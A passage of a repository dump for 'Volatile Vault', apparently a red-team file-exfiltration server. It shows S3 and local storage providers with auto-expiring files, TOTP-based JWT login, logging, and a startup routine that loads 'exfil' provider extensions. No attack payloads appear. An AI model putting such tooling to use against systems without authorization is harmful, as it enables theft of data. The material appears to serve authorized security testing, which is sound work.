6 | 7 | This storage allows Volatile Vault to use AWS S3 buckets for file storage and retrieval. 8 | 9 | # Configuration 10 | 11 | Example: 12 | 13 | ```yaml 14 | --- 15 | storage: 16 | awss3: 17 | access_key_id: 18 | secret_access_key: 19 | region: 20 | bucket: 21 | user_arn: arn:aws:iam:::user/ 22 | max_size: 104857600 23 | file_expiry: 5 24 | generate_presigned_urls: true 25 | ``` 26 | 27 | Fields: 28 | 29 | - `access_key_id`: AWS IAM access key to use for authentication. 30 | - `secret_access_key`: AWS IAM secret access key to use for authentication. 31 | - `region`: AWS region to use when creating new buckets. 32 | - `bucket`: Name of the bucket to use (or create if non-existant). 33 | - `user_arn`: ARN of the user associated to the above credentials. Used to set permissions on the bucket. 34 | - `max_size`: Maximum allows size of files to store. 35 | - `file_expiry`: Duration (in minutes) after which files will be removed automatically. 36 | - `generate_presigned_urls`: Whether or not to generate presigned URLs (for public download) of uploaded files. 37 | 38 | > /!\ Note: In order for the automatic file deletion to work as expected, the bucket used with this extension needs to have specific permissions set to allow VolatileVault to query the "LastModified" field of files. The policy used for this operation can be found [here](./bucketpolicy.json). -------------------------------------------------------------------------------- /server/src/extensions/storage/AwsS3/awss3.ts: -------------------------------------------------------------------------------- 1 | import { Config, StorageAwsS3 } from 'src/config/config'; 2 | import winston from 'winston'; 3 | import { Logger } from '../../../logging'; 4 | import { 5 | BaseExtension, 6 | ExtensionInfo, 7 | FileUploadInformation, 8 | } from '../../extension'; 9 | import { ExtensionRepository } from '../../repository'; 10 | import { 11 | StorageData, 12 | StorageProvider, 13 | StorageProviderCapabilities, 14 | } from '../provider'; 15 | import { S3Wrapper } from './wrapper'; 16 | import cron from 'node-cron'; 17 | 18 | export class AwsS3StorageProvider 19 | extends BaseExtension 20 | implements StorageProvider 21 | { 22 | get clientConfig(): ExtensionInfo { 23 | return { 24 | name: AwsS3StorageProvider.NAME, 25 | displayName: 'AWS S3 Bucket', 26 | info: { 27 | max_size: this.config.max_size, 28 | file_expiry: this.config.file_expiry, 29 | }, 30 | }; 31 | } 32 | private static NAME: string = 'awss3'; 33 | private logger: winston.Logger; 34 | private client: S3Wrapper; 35 | 36 | public constructor() { 37 | super(AwsS3StorageProvider.NAME, ['None']); 38 | this.logger = Logger.Instance.createChildLogger('AwsS3'); 39 | } 40 | 41 | async init(cfg: Config): Promise { 42 | this.cfg = cfg; 43 | if (this.config) { 44 | this.logger.debug('Initializing S3 client...'); 45 | this.client = new S3Wrapper( 46 | this.config.access_key_id, 47 | this.config.secret_access_key, 48 | this.config.region, 49 | this.config.bucket, 50 | this.config.file_expiry, 51 | this.config.user_arn 52 | ); 53 | 54 | this.logger.debug('Validating credentials...'); 55 | if ((await this.client.validateCredentials()) == false) { 56 | this.state = 'InitializationError'; 57 | return; 58 | } 59 | 60 | await this.client.createBucketIfNotExists(); 61 | 62 | this.logger.info('Initialized & validated credentials'); 63 | this.register(); 64 | this.state = 'Initialized'; 65 | } else { 66 | this.logger.debug('Config not set'); 67 | this.state = 'Unconfigured'; 68 | } 69 | } 70 | 71 | protected register() { 72 | ExtensionRepository.getInstance().registerStorage(this); 73 | } 74 | 75 | get config(): StorageAwsS3 { 76 | return this.cfg.storage.awss3; 77 | } 78 | 79 | has(id: string): Promise { 80 | return this.client.fileExists(id); 81 | } 82 | 83 | async store(data: StorageData): Promise { 84 | this.logger.debug(`Uploading ${data.size} bytes`); 85 | const id = await this.client.uploadFile(data.stream); 86 | this.logger.debug(`Done: ${id}`); 87 | var url: string | undefined = undefined; 88 | if (this.config.generate_presigned_urls) 89 | url = await this.client.getPresignedUrl(id); 90 | 91 | return { 92 | id, 93 | url, 94 | creationDate: new Date(Date.now()), 95 | }; 96 | } 97 | 98 | async retrieve(info: FileUploadInformation): Promise { 99 | const [stream, size] = await this.client.downloadFile(info.id); 100 | return { 101 | size, 102 | stream, 103 | }; 104 | } 105 | 106 | async remove(info: FileUploadInformation): Promise { 107 | await this.client.removeFile(info.id); 108 | } 109 | 110 | public override installCron(): Promise { 111 | cron.schedule('0 * * * * *', () => this.client.deleteOldFiles()); 112 | return Promise.resolve(); 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /server/src/extensions/storage/AwsS3/bucketpolicy.json: -------------------------------------------------------------------------------- 1 | { 2 | "Version": "2012-10-17", 3 | "Statement": [ 4 | { 5 | "Effect": "Allow", 6 | "Principal": { 7 | "AWS": "" 8 | }, 9 | "Action": "s3:GetObject", 10 | "Resource": "", 11 | "Condition": { 12 | "StringEquals": { 13 | "s3:ExistingObjectTag/HasMetadata": "true" 14 | } 15 | } 16 | } 17 | ] 18 | } 19 | -------------------------------------------------------------------------------- /server/src/extensions/storage/AwsS3/wrapper.ts: -------------------------------------------------------------------------------- 1 | import { 2 | BucketLocationConstraint, 3 | CreateBucketCommand, 4 | DeleteObjectCommand, 5 | GetObjectCommand, 6 | HeadBucketCommand, 7 | HeadObjectCommand, 8 | ListObjectsV2Command, 9 | PutBucketPolicyCommand, 10 | PutObjectCommand, 11 | S3Client, 12 | } from '@aws-sdk/client-s3'; 13 | import { Upload } from '@aws-sdk/lib-storage'; 14 | import { Logger } from '../../../logging'; 15 | import winston from 'winston'; 16 | import { Readable } from 'node:stream'; 17 | import ShortUniqueId from 'short-unique-id'; 18 | import { getSignedUrl } from '@aws-sdk/s3-request-presigner'; 19 | import moment from 'moment'; 20 | import bucketpolicy from './bucketpolicy.json'; 21 | 22 | const fileids = new ShortUniqueId({ length: 6, dictionary: 'alpha_upper' }); 23 | 24 | export class S3Wrapper { 25 | private client: S3Client; 26 | private logger: winston.Logger; 27 | private bucket: string; 28 | private region: string; 29 | private lifetime: number; 30 | private user_arn: string; 31 | 32 | public constructor( 33 | accessKeyId: string, 34 | secretAccessKey: string, 35 | region: string, 36 | bucket: string, 37 | lifetime: number, 38 | user_arn: string 39 | ) { 40 | this.client = new S3Client({ 41 | credentials: { 42 | accessKeyId, 43 | secretAccessKey, 44 | }, 45 | apiVersion: 'latest', 46 | region, 47 | }); 48 | this.bucket = bucket; 49 | this.region = region; 50 | this.lifetime = lifetime; 51 | this.user_arn = user_arn; 52 | this.logger = Logger.Instance.createChildLogger('AwsS3Wrapper'); 53 | } 54 | 55 | public async createBucketIfNotExists(): Promise { 56 | try { 57 | await this.client.send(new HeadBucketCommand({ Bucket: this.bucket })); 58 | this.logger.debug(`Bucket ${this.bucket} exists!`); 59 | } catch (error) { 60 | if (error.name === 'NotFound') { 61 | this.logger.debug(`Bucket ${this.bucket} does not exist; creating...`); 62 | await this.createBucket(); 63 | this.logger.debug(`Setting bucket policy...`); 64 | await this.setBucketPolicy(); 65 | this.logger.info(`Bucket ${this.bucket} created & configured!`); 66 | } else { 67 | throw error; 68 | } 69 | } 70 | } 71 | 72 | private async createBucket(): Promise { 73 | try { 74 | const command = new CreateBucketCommand({ 75 | Bucket: this.bucket, 76 | CreateBucketConfiguration: { 77 | LocationConstraint: BucketLocationConstraint[this.region], 78 | }, 79 | }); 80 | await this.client.send(command); 81 | this.logger.info(`Created bucket ${this.bucket}!`); 82 | } catch (error) { 83 | this.logger.error( 84 | `Failed to create bucket: ${error?.name} ${error?.message ?? error}` 85 | ); 86 | throw error; 87 | } 88 | } 89 | 90 | private async setBucketPolicy(): Promise { 91 | var policy = bucketpolicy; 92 | 93 | policy.Statement[0].Principal.AWS = this.user_arn; 94 | policy.Statement[0].Resource = `arn:aws:s3:::${this.bucket}/*`; 95 | 96 | const params = { 97 | Bucket: this.bucket, 98 | Policy: JSON.stringify(policy), 99 | }; 100 | 101 | const command = new PutBucketPolicyCommand(params); 102 | 103 | try { 104 | await this.client.send(command); 105 | this.logger.info(`Configured bucket policy for ${this.bucket}!`); 106 | } catch (error) { 107 | this.logger.error( 108 | `Failed to set bucket policy: ${error?.name} ${error?.message ?? error}` 109 | ); 110 | throw error; 111 | } 112 | } 113 | 114 | public async validateCredentials(): Promise { 115 | try { 116 | await this.client.send(new HeadBucketCommand({ Bucket: this.bucket })); 117 | return true; 118 | } catch (error) { 119 | if ( 120 | error.name === 'InvalidAccessKeyId' || 121 | error.name === 'SignatureDoesNotMatch' 122 | ) { 123 | return false; 124 | } else if (error.name === 'NotFound') { 125 | return true; 126 | } else { 127 | this.logger.error( 128 | `Failed validating AWS S3 credentials: ${error?.name} ${ 129 | error?.message ?? error 130 | }` 131 | ); 132 | throw error; 133 | } 134 | } 135 | } 136 | 137 | public async fileExists(id: string): Promise { 138 | const headObjectParams = { 139 | Bucket: this.bucket, 140 | Key: id, 141 | }; 142 | const command = new HeadObjectCommand(headObjectParams); 143 | 144 | try { 145 | await this.client.send(command); 146 | return true; 147 | } catch (error) { 148 | if (error.name === 'NotFound') { 149 | return false; 150 | } else { 151 | this.logger.error( 152 | `Failed to query object: ${error?.name} ${error?.message ?? error}` 153 | ); 154 | throw error; 155 | } 156 | } 157 | } 158 | 159 | public async downloadFile(id: string): Promise<[Readable, number]> { 160 | const getObjectParams = { 161 | Bucket: this.bucket, 162 | Key: id, 163 | }; 164 | const command = new GetObjectCommand(getObjectParams); 165 | 166 | try { 167 | const response = await this.client.send(command); 168 | const body = response.Body as Readable; 169 | return [body, response.ContentLength]; 170 | } catch (error) { 171 | this.logger.error( 172 | `Failed to download file: ${error?.name} ${error?.message ?? error}` 173 | ); 174 | throw error; 175 | } 176 | } 177 | 178 | public async uploadFile(data: Readable): Promise { 179 | const id = fileids.rnd(); 180 | 181 | const uploader = new Upload({ 182 | client: this.client, 183 | params: { 184 | Bucket: this.bucket, 185 | Key: id, 186 | Body: data, 187 | }, 188 | }); 189 | 190 | try { 191 | await uploader.done(); 192 | return id; 193 | } catch (error) { 194 | this.logger.error( 195 | `Failed to upload file: ${error?.name} ${error?.message ?? error}` 196 | ); 197 | throw error; 198 | } 199 | } 200 | 201 | public async removeFile(id: string): Promise { 202 | const command = new DeleteObjectCommand({ 203 | Bucket: this.bucket, 204 | Key: id, 205 | }); 206 | 207 | try { 208 | await this.client.send(command); 209 | } catch (error) { 210 | this.logger.error( 211 | `Failed to remove file: ${error?.name} ${error?.message ?? error}` 212 | ); 213 | throw error; 214 | } 215 | } 216 | 217 | public async getPresignedUrl(id: string): Promise { 218 | const getObjectParams = { 219 | Bucket: this.bucket, 220 | Key: id, 221 | }; 222 | const command = new GetObjectCommand(getObjectParams); 223 | const url = await getSignedUrl(this.client, command, { 224 | expiresIn: this.lifetime * 60, 225 | }); 226 | return url; 227 | } 228 | 229 | public async deleteOldFiles(): Promise { 230 | const listCommand = new ListObjectsV2Command({ 231 | Bucket: this.bucket, 232 | }); 233 | 234 | try { 235 | const listObjectsResponse = await this.client.send(listCommand); 236 | if (!listObjectsResponse.Contents) return; 237 | 238 | const now = moment(); 239 | const objectsToDelete = listObjectsResponse.Contents.filter((object) => { 240 | const lastModified = object.LastModified!; 241 | const ageInMinutes = now.diff(moment(lastModified), 'minutes'); 242 | return ageInMinutes > this.lifetime; 243 | }); 244 | 245 | for (const object of objectsToDelete) { 246 | this.logger.debug(`Removing expired file ${object.Key}`); 247 | await this.removeFile(object.Key!); 248 | } 249 | } catch (error) { 250 | this.logger.error( 251 | `Failed to remove expired files: ${error?.name} ${ 252 | error?.message ?? error 253 | }` 254 | ); 255 | throw error; 256 | } 257 | } 258 | } 259 | -------------------------------------------------------------------------------- /server/src/extensions/storage/FileSystem/README.md: -------------------------------------------------------------------------------- 1 |
2 | 3 |

Volatile Vault - FileSystem Storage

4 |
5 |
6 | 7 | This storage allows Volatile Vault to store files to and retrieve them from its harddrive. 8 | 9 | # Configuration 10 | 11 | Example: 12 | 13 | ```yaml 14 | --- 15 | storage: 16 | filesystem: 17 | folder: './files_basic' 18 | max_size: 104857600 19 | file_expiry: 60 20 | ``` 21 | 22 | Fields: 23 | 24 | - `folder`: Absolute or relative folder to store files in. 25 | - `max_size`: Maximum allows size of files to store. 26 | - `file_expiry`: Duration (in minutes) after which files will be removed automatically. 27 | -------------------------------------------------------------------------------- /server/src/extensions/storage/FileSystem/filesystem.ts: -------------------------------------------------------------------------------- 1 | import { 2 | StorageData, 3 | StorageProvider, 4 | StorageProviderCapabilities, 5 | } from '../provider'; 6 | import { BaseExtension, ExtensionInfo, FileUploadInformation } from '../../extension'; 7 | import { 8 | StorageFileSystem, 9 | Config, 10 | } from '../../../config/config'; 11 | import { FsUtils } from '../../../fs'; 12 | import { ExtensionRepository } from '../../repository'; 13 | import cron from 'node-cron'; 14 | import winston from 'winston'; 15 | import { Logger } from '../../../logging'; 16 | 17 | export class FileSystemStorageProvider 18 | extends BaseExtension 19 | implements StorageProvider 20 | { 21 | get clientConfig(): ExtensionInfo { 22 | return { 23 | name: FileSystemStorageProvider.NAME, 24 | displayName: 'Server Filesystem', 25 | info: { 26 | max_size: this.config.max_size, 27 | file_expiry: this.config.file_expiry, 28 | }, 29 | }; 30 | } 31 | private static NAME: string = 'filesystem'; 32 | private logger: winston.Logger; 33 | private fs: FsUtils; 34 | 35 | public constructor() { 36 | super(FileSystemStorageProvider.NAME, ['None']); 37 | this.logger = Logger.Instance.createChildLogger('FileSystem'); 38 | this.fs = new FsUtils(FileSystemStorageProvider.NAME); 39 | } 40 | get config(): StorageFileSystem { 41 | return this.cfg.storage.filesystem; 42 | } 43 | 44 | async has(id: string): Promise { 45 | return await this.fs.hasFile(id); 46 | } 47 | 48 | protected register() { 49 | ExtensionRepository.getInstance().registerStorage(this); 50 | } 51 | 52 | async init(cfg: Config): Promise { 53 | this.cfg = cfg; 54 | 55 | if (this.config) { 56 | await this.fs.init(this.config.folder); 57 | this.logger.info('Initialized'); 58 | this.register(); 59 | } else { 60 | this.logger.debug('Config not set'); 61 | } 62 | } 63 | 64 | async store(data: StorageData): Promise { 65 | this.logger.debug(`Storing ${data.size} bytes`); 66 | const info = await this.fs.putFile(data.stream); 67 | this.logger.debug(`Done: ${info.id}`); 68 | return { 69 | creationDate: info.creationDate, 70 | id: info.id, 71 | }; 72 | } 73 | 74 | async retrieve(info: FileUploadInformation): Promise { 75 | const [stream, size] = await this.fs.getFile(info.id); 76 | return { 77 | stream, 78 | size, 79 | }; 80 | } 81 | 82 | async remove(info: FileUploadInformation): Promise { 83 | await this.fs.removeFile(info.id); 84 | } 85 | 86 | public override installCron(): Promise { 87 | cron.schedule('0 * * * * *', () => { 88 | this.fs.cleanup(1000 * 60 * this.config.file_expiry); 89 | }); 90 | return Promise.resolve(); 91 | } 92 | } 93 | -------------------------------------------------------------------------------- /server/src/extensions/storage/provider.ts: -------------------------------------------------------------------------------- 1 | import { Readable } from 'node:stream'; 2 | import { Extension, FileUploadInformation } from '../extension'; 3 | import { BaseStorage } from '../../config/config'; 4 | 5 | 6 | /** 7 | * Holds a binary stream and its length 8 | * 9 | * @export 10 | * @interface StorageData 11 | * @typedef {StorageData} 12 | */ 13 | export interface StorageData { 14 | stream: Readable; // Stream to read binary contents from 15 | size: number; // Length of stream 16 | } 17 | 18 | /** 19 | * Enum that lets storage providers declare their supported capabilities 20 | * 21 | * @export 22 | * @enum {number} 23 | */ 24 | export type StorageProviderCapabilities = 'None' | 'Reserved' | 'Remove'; 25 | 26 | /** 27 | * Basic interface for file storage/retrieval 28 | * 29 | * @export 30 | * @interface StorageProvider 31 | * @typedef {StorageProvider} 32 | */ 33 | export interface StorageProvider 34 | extends Extension { 35 | get config() : BaseStorage; 36 | has(id: string): Promise; 37 | store(data: StorageData): Promise; 38 | retrieve(info: FileUploadInformation): Promise; 39 | remove(info: FileUploadInformation): Promise; 40 | } 41 | -------------------------------------------------------------------------------- /server/src/fs.ts: -------------------------------------------------------------------------------- 1 | import fsSync, { ReadStream } from 'fs'; 2 | import fs, { constants } from 'fs/promises'; 3 | import { Readable } from 'node:stream'; 4 | import path from 'path'; 5 | import ShortUniqueId from 'short-unique-id'; 6 | import { pipeline } from 'stream/promises'; 7 | import winston from 'winston'; 8 | import { Logger } from './logging'; 9 | 10 | export interface FileInfo { 11 | id: string; 12 | creationDate: Date; 13 | } 14 | 15 | interface FsDatabase { 16 | getFiles(): Promise; 17 | getFile(id: string): Promise; 18 | removeFile(id: string): Promise; 19 | putFile(): Promise; 20 | } 21 | 22 | const fileids = new ShortUniqueId({ length: 6, dictionary: 'alpha_upper' }); 23 | 24 | class InMemoryDatabase implements FsDatabase { 25 | private files: FileInfo[] = []; 26 | 27 | private static firstOrDefault(items: T[]): T | null { 28 | return items?.length ? items[0] : null; 29 | } 30 | 31 | async getFiles(): Promise { 32 | return this.files; 33 | } 34 | 35 | async getFile(id: string): Promise { 36 | const file: FileInfo | null = InMemoryDatabase.firstOrDefault( 37 | this.files.filter((f) => f.id == id) 38 | ); 39 | if (file === null) throw `File with id "${id}" not found!`; 40 | return file; 41 | } 42 | 43 | async removeFile(id: string): Promise { 44 | try { 45 | const file = await this.getFile(id); 46 | this.files = this.files.filter((f) => f.id != id); 47 | } catch (error) { 48 | throw error; 49 | } 50 | } 51 | 52 | async putFile(): Promise { 53 | const id = fileids.rnd(); 54 | if (InMemoryDatabase.firstOrDefault(this.files.filter((f) => f.id == id))) 55 | throw `File with path "${path}" already exists!`; 56 | 57 | var _file = { 58 | id: id, 59 | creationDate: new Date(Date.now()), 60 | }; 61 | this.files.push(_file); 62 | 63 | return _file; 64 | } 65 | } 66 | 67 | export class FsUtils { 68 | private db: FsDatabase = new InMemoryDatabase(); 69 | private dir: string; 70 | private logger: winston.Logger; 71 | 72 | public constructor(name: string) { 73 | this.logger = Logger.Instance.createChildLogger(`FS:${name}`); 74 | } 75 | 76 | public async init(dir: string): Promise { 77 | this.dir = path.resolve(dir); 78 | 79 | if (await this.exists(this.dir)) { 80 | this.logger.info(`Removing ${this.dir}`); 81 | await fs.rm(this.dir, { recursive: true, force: true }); 82 | } 83 | this.logger.info(`Creating ${this.dir}`); 84 | await fs.mkdir(this.dir, { recursive: true }); 85 | } 86 | 87 | private async exists(path: string): Promise { 88 | try { 89 | await fs.access(path, constants.R_OK | constants.W_OK); 90 | return true; 91 | } catch { 92 | return false; 93 | } 94 | } 95 | 96 | public async getFiles(): Promise { 97 | return this.db.getFiles(); 98 | } 99 | 100 | public async hasFile(id: string): Promise { 101 | return await this.exists(path.join(this.dir, id)); 102 | } 103 | 104 | public async getFile(id: string): Promise<[ReadStream, number]> { 105 | const _file: FileInfo | null = await this.db.getFile(id); 106 | const _path = path.join(this.dir, _file.id); 107 | if (!(await this.exists(_path))) throw `File "${_path}" does not exist!`; 108 | 109 | var stat = await fs.stat(_path); 110 | return [fsSync.createReadStream(_path, { flags: 'r' }), stat.size]; 111 | } 112 | 113 | public async putFile(data: Readable): Promise { 114 | this.logger.debug('Putting file...'); 115 | const file = await this.db.putFile(); 116 | this.logger.debug(`File: ${file.id}`); 117 | var str = fsSync.createWriteStream(path.join(this.dir, file.id), { 118 | flags: 'w', 119 | encoding: 'binary', 120 | }); 121 | this.logger.debug(`Writing to ${str.path}...`); 122 | await pipeline(data, str); 123 | this.logger.debug('Done!'); 124 | return file; 125 | } 126 | 127 | public async removeFile(id: string): Promise { 128 | this.logger.debug(`Removing ${id} from db...`); 129 | await this.db.removeFile(id); 130 | this.logger.debug(`Removing ${id} from disk..`); 131 | fsSync.rmSync(path.join(this.dir, id)); 132 | } 133 | 134 | public async cleanup(ageMs: number): Promise { 135 | var now = new Date(Date.now()); 136 | for (const file of await this.db.getFiles()) { 137 | if (now.getTime() - file.creationDate.getTime() >= ageMs) { 138 | this.logger.info(`Removing ${file.id}`); 139 | await fs.rm(path.join(this.dir, file.id), { force: true }); 140 | await this.db.removeFile(file.id); 141 | } 142 | } 143 | } 144 | } 145 | -------------------------------------------------------------------------------- /server/src/jwt.ts: -------------------------------------------------------------------------------- 1 | import { expressjwt } from 'express-jwt'; 2 | import { generateKeyPairSync } from 'crypto'; 3 | 4 | export class Keys { 5 | private static instance: Keys = null; 6 | private privKey: string; 7 | private pubKey: string; 8 | public get privateKey() { 9 | return this.privKey; 10 | } 11 | public get publicKey() { 12 | return this.pubKey; 13 | } 14 | 15 | public static getInstance(): Keys { 16 | if (Keys.instance != null) return Keys.instance; 17 | Keys.instance = new Keys(); 18 | 19 | const res = generateKeyPairSync('rsa', { 20 | modulusLength: 4096, 21 | publicKeyEncoding: { 22 | type: 'spki', 23 | format: 'pem', 24 | }, 25 | privateKeyEncoding: { 26 | type: 'pkcs8', 27 | format: 'pem', 28 | }, 29 | }); 30 | Keys.instance.privKey = res.privateKey; 31 | Keys.instance.pubKey = res.publicKey; 32 | 33 | return Keys.instance; 34 | } 35 | } 36 | 37 | export const jwt = expressjwt({ 38 | secret: Keys.getInstance().publicKey, 39 | algorithms: ['RS512'], 40 | }); 41 | -------------------------------------------------------------------------------- /server/src/logging.ts: -------------------------------------------------------------------------------- 1 | import winston from 'winston'; 2 | import path from 'path'; 3 | import process from 'process'; 4 | 5 | export class Logger { 6 | private logger: winston.Logger; 7 | private static instance: Logger = null; 8 | 9 | public static get Instance(): Logger { 10 | if (Logger.instance == null) Logger.instance = new Logger(); 11 | 12 | return Logger.instance; 13 | } 14 | 15 | private constructor() { 16 | this.logger = winston.createLogger({ 17 | defaultMeta: { mainLabel: 'Server' }, 18 | level: 'debug', 19 | format: winston.format.combine( 20 | winston.format.timestamp({ format: 'YYYY-MM-DD HH:mm:ss.SSS' }), 21 | winston.format.align(), 22 | winston.format.printf( 23 | ({ message, timestamp, level, mainLabel, childLabel }) => { 24 | return `${timestamp} (${ 25 | childLabel || mainLabel 26 | }) [${level}] -> ${message}`; 27 | } 28 | ) 29 | ), 30 | transports: [ 31 | new winston.transports.Console(), 32 | new winston.transports.File({ 33 | filename: path.join(process.cwd(), 'logs', 'volatilevault.log'), 34 | lazy: true, 35 | maxsize: 100 * 1024 * 1024, // 100MB 36 | maxFiles: 10, 37 | tailable: true, 38 | zippedArchive: true, 39 | }), 40 | ], 41 | }); 42 | } 43 | 44 | public get defaultLogger(): winston.Logger { 45 | return this.logger; 46 | } 47 | public createChildLogger(label: string): winston.Logger { 48 | return this.logger.child({ childLabel: label }); 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /server/src/routes/auth.ts: -------------------------------------------------------------------------------- 1 | import express, { Request, Response } from 'express'; 2 | import jwt from 'jsonwebtoken'; 3 | import OTPAuth from 'otpauth'; 4 | import bodyParser from 'body-parser'; 5 | import { Keys } from '../jwt'; 6 | import { ConfigInstance } from '../config/instance'; 7 | 8 | export const getAuthRoute = () => { 9 | const authRoute = express.Router(); 10 | 11 | interface TotpRequestData { 12 | totp?: string; 13 | } 14 | 15 | const totp = new OTPAuth.TOTP({ 16 | algorithm: 'SHA1', 17 | digits: 6, 18 | period: 30, 19 | secret: ConfigInstance.Inst.general.totp_secret, 20 | }); 21 | 22 | authRoute.use(bodyParser.json()); 23 | 24 | authRoute.get('/api/auth', (req: Request, res: Response) => { 25 | // This route gets caught by the JWT middleware so if we get here the user got a valid JWT. 26 | return res.status(200).json({ message: 'Authentication success' }); 27 | }); 28 | 29 | authRoute.post('/api/auth', (req: Request, res: Response) => { 30 | var _totp = req.body as TotpRequestData; 31 | 32 | if ( 33 | !_totp?.totp || 34 | totp.validate({ token: _totp.totp.replace(/\s/g, ''), window: 3 }) == null 35 | ) 36 | return res.status(401).json({ message: 'Invalid TOTP' }); 37 | 38 | var _jwt = jwt.sign({}, Keys.getInstance().privateKey, { 39 | algorithm: 'RS512', 40 | expiresIn: `${ConfigInstance.Inst.general.jwt_expiry}m`, 41 | subject: 'volatile.vault.dweller', 42 | }); 43 | res.status(200).json({ message: 'Authentication success', token: _jwt }); 44 | }); 45 | return authRoute; 46 | }; 47 | -------------------------------------------------------------------------------- /server/src/routes/config.ts: -------------------------------------------------------------------------------- 1 | import express, { Request, Response } from 'express'; 2 | import { ExtensionRepository } from '../extensions/repository'; 3 | 4 | export const getConfigRoute = () => { 5 | const configRoute = express.Router(); 6 | 7 | configRoute.get('/api/config', async (req: Request, res: Response) => { 8 | var storages = {} 9 | for (const storage of ExtensionRepository.getInstance().storages) { 10 | storages[storage.name] = storage.clientConfig; 11 | } 12 | var exfils = {} 13 | for (const exfil of ExtensionRepository.getInstance().exfils) { 14 | exfils[exfil.name] = exfil.clientConfig; 15 | } 16 | return res.status(201).json({ 17 | message: 'Request successful', 18 | storages: storages, 19 | exfils: exfils 20 | }); 21 | }); 22 | return configRoute; 23 | }; 24 | -------------------------------------------------------------------------------- /server/src/routes/index.ts: -------------------------------------------------------------------------------- 1 | import express from 'express'; 2 | import { getAuthRoute } from './auth'; 3 | import { getConfigRoute } from './config'; 4 | 5 | export const getRoutes = () => { 6 | const routes = express.Router(); 7 | routes.use(getAuthRoute()); 8 | routes.use(getConfigRoute()); 9 | return routes; 10 | }; 11 | -------------------------------------------------------------------------------- /server/src/server.ts: -------------------------------------------------------------------------------- 1 | import { ConfigInstance } from './config/instance'; 2 | import { getRoutes } from './routes'; 3 | import express, { Response, NextFunction } from 'express'; 4 | import { jwt } from './jwt'; 5 | import { Request as JWTRequest, UnauthorizedError } from 'express-jwt'; 6 | import bodyParser from 'body-parser'; 7 | import cors from 'cors'; 8 | import nocache from 'nocache'; 9 | import { FileSystemStorageProvider } from './extensions/storage/FileSystem/filesystem'; 10 | import { ExtensionRepository } from './extensions/repository'; 11 | import { BasicHTTPExfilProvider } from './extensions/exfil/BasicHttp/basichttp'; 12 | import { Logger } from './logging'; 13 | import { AwsCloudFrontExfilProvider } from './extensions/exfil/AwsCloudFront/awscloudfront'; 14 | import { AwsS3StorageProvider } from './extensions/storage/AwsS3/awss3'; 15 | 16 | const EXTENSIONS = [ 17 | new BasicHTTPExfilProvider(), 18 | new FileSystemStorageProvider(), 19 | new AwsCloudFrontExfilProvider(), 20 | new AwsS3StorageProvider() 21 | ]; 22 | 23 | const logger = Logger.Instance.defaultLogger; 24 | 25 | logger.info('Starting up...'); 26 | 27 | const main = async (): Promise => { 28 | logger.info('Initializing config...'); 29 | await ConfigInstance.init(); 30 | 31 | for (const extension of EXTENSIONS) { 32 | logger.info(`Initializing extension ${extension.name}...`); 33 | await extension.init(ConfigInstance.Inst); 34 | } 35 | 36 | const failed = EXTENSIONS.filter((e) => e.state == 'InitializationError'); 37 | if (failed.length > 0) { 38 | throw new Error( 39 | `The following extension(s) failed to initialize: ${failed 40 | .map((f) => f.name) 41 | .join(', ')}` 42 | ); 43 | } 44 | 45 | if (ExtensionRepository.getInstance().exfils.length == 0) 46 | throw new Error( 47 | 'No exfil provider was initialized: verify that at least one is configured.' 48 | ); 49 | 50 | if (ExtensionRepository.getInstance().storages.length == 0) 51 | throw new Error( 52 | 'No storage provider was initialized: verify that at least one is configured.' 53 | ); 54 | 55 | const app = express(); 56 | 57 | app.disable('x-powered-by'); 58 | 59 | app.use(nocache()); 60 | app.use( 61 | cors({ 62 | origin: (origin, cb) => { 63 | Promise.all( 64 | ExtensionRepository.getInstance().exfils.map((e) => e.hosts) 65 | ).then((all) => cb(null, all.flat())); 66 | }, 67 | methods: ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS'], 68 | allowedHeaders: ['Authorization', 'Content-Type'], 69 | credentials: true, 70 | }) 71 | ); // TODO: Disable in prod! 72 | 73 | app.use(bodyParser.urlencoded({ extended: false })); 74 | 75 | app.use( 76 | '/api', 77 | jwt.unless({ path: [{ url: '/api/auth', method: 'POST' }] }), 78 | ( 79 | err: UnauthorizedError, 80 | req: JWTRequest, 81 | res: Response, 82 | next: NextFunction 83 | ) => { 84 | if (err || !req.auth?.sub) 85 | return res.status(401).json({ message: 'Authentication failure' }); 86 | return next(); 87 | } 88 | ); 89 | 90 | app.use(getRoutes()); 91 | for (const extension of ExtensionRepository.getInstance().exfils) { 92 | logger.info(`Installing routes for ${extension.name}...`); 93 | await extension.installRoutes(app); 94 | } 95 | 96 | app.use((error, req, res, next) => { 97 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 98 | }); 99 | 100 | app.use(express.static('public')); 101 | 102 | for (const extension of ExtensionRepository.getInstance().exfils) { 103 | await extension.installCron(); 104 | } 105 | for (const extension of ExtensionRepository.getInstance().storages) { 106 | await extension.installCron(); 107 | } 108 | 109 | const PORT = ConfigInstance.Inst.general.port || 3000; 110 | app.listen(PORT, () => { 111 | logger.info(`Application started on port ${PORT}!`); 112 | }); 113 | }; 114 | 115 | main().catch((error) => { 116 | logger.error(error.message); 117 | }); 118 | -------------------------------------------------------------------------------- /server/src/streams.ts: -------------------------------------------------------------------------------- 1 | import { Readable } from 'stream'; 2 | 3 | export async function readFixedChunks( 4 | readable: Readable, 5 | chunkSize: number, 6 | onChunkCb: (chunk: Buffer, idx: number) => Promise 7 | ): Promise { 8 | let buffer = Buffer.alloc(0); 9 | let count = 0; 10 | let processing = false; // Flag to indicate if a chunk is currently being processed 11 | const queue = []; // Queue to hold pending chunks 12 | 13 | const processQueue = async () => { 14 | if (processing) return; // If already processing, return early 15 | processing = true; // Set the processing flag 16 | 17 | while (queue.length > 0) { 18 | const { chunk, index } = queue.shift(); // Dequeue the next chunk 19 | 20 | try { 21 | await onChunkCb(chunk, index); // Process the chunk with the async callback 22 | } catch (error) { 23 | readable.destroy(error); // If the callback fails, destroy the stream 24 | throw error; 25 | } 26 | } 27 | 28 | processing = false; // Reset the processing flag 29 | }; 30 | 31 | return new Promise((resolve, reject) => { 32 | readable.on('data', (data) => { 33 | buffer = Buffer.concat([buffer, data]); 34 | 35 | while (buffer.length >= chunkSize) { 36 | const chunk = buffer.slice(0, chunkSize); // Extract a chunk of the desired size 37 | queue.push({ chunk, index: count++ }); // Enqueue the chunk 38 | buffer = buffer.slice(chunkSize); // Remove the extracted chunk from the buffer 39 | } 40 | processQueue().catch(reject); 41 | }); 42 | 43 | readable.on('end', () => { 44 | if (buffer.length > 0) { 45 | 